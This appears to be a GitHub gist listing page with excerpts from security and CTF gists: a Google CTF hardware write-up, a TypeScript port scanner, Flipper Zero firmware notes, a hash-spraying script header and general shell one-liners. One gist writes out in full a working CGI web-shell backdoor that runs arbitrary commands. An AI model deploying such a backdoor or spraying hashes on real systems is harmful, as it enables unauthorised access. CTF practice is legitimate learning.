😃
Hacking the planet 🚀

Ryan Montgomery 0dayCTF

@szymex73
szymex73 / 00-writeup.md
Last active July 5, 2022 20:05
Google CTF 2022 - Engraver

Engraver

Engraver was a hardware challenge in Google CTF 2022 that involved recovering the movements of a robotic arm engraving the flag from a pcap dump of the commands sent to the device.

For the challenge, we were given the mentioned pcap containing USB traffic and two images of the robot arm (one of the robot arm idle, one during the engraving process).

Taking a look at the PCAP

The provided PCAP file contains a dump of USB traffic from a specific USB device. We can see the typical USB configuration packets being sent at the beginning (host fetching the USB descriptors) and afterward we see a lot of URB interrupts from the host with HID data attached.

Figuring out the hardware part

@f11snipe
f11snipe / portscan.ts
Created June 22, 2022 06:50
Simple tcp port scanner poc in typescript
import net from 'net';
import async from 'async';
const { VMIP = '127.0.0.1', PORTS = '1-65535' } = process.env;
const MAX_SCANS = 4096;
const SCAN_HOST = VMIP;
const TIMEOUT = 2000;
const report: { [port: number]: string } = {};
const ports: number[] = [];
const groups: string[] = PORTS.split(',');
@djsime1
djsime1 / fz_forks.md
Last active November 18, 2024 18:34
Flipper Zero firmware differences

This document has moved!

This comparison list has been relocated into the Awesome Flipper Zero repository. While you can still read an archived version in this gist, all future updates will take place in the new repository.

Last archived version (Adapted from Nano's original messages in the Unleashed firmware Discord.)

Flipper Zero firmware differences

:: Last updated July 10 2022. ::

@0xjbb
0xjbb / tgtspray.sh
Last active December 25, 2020 01:09
TGTSpray. A tool to spray hashes when smb/winrm lock you out :(
#!/usr/bin/bash
# made by 0xjb, definitely not made for any ctf boxes
# Hash spraying when crackmapexec locks you out :(
# Is it good? no
# Did it work for me in a time of need? yes.
# Will it work for you? ¯\_(ツ)_/¯
if [ "$#" -ne 2 ];then
echo "Usage: $0 <DOMAIN/User> <File of NTLM hashes 'hash:hash'>"
@MarkBaggett
MarkBaggett / gist:38dcff6a0975f148aa858e924d64c492
Created November 14, 2020 18:22
http.server cgi backdoor
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi
@johnnypea
johnnypea / useful-one-liners.sh
Last active June 2, 2025 14:16
Useful one liners
# Run the last command as root
sudo !!
# Serve current directory tree at http://$HOSTNAME:8000/
python -m SimpleHTTPServer
# Save a file you edited in vim without the needed permissions
:w !sudo tee %
# change to the previous working directory
cd -
# Runs previous command but replacing
^foo^bar
@AvasDream
AvasDream / htb.md
Last active February 5, 2025 04:39
Cheatsheet for HackTheBox

Purpose

Cheatsheet for HackTheBox with common things to do while solving these CTF challenges.

Because a smart man once said:

Never google twice.

Linux General

#!/bin/bash
# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update
# remove previously installed Docker
sudo apt-get purge lxc-docker*
sudo apt-get purge docker.io*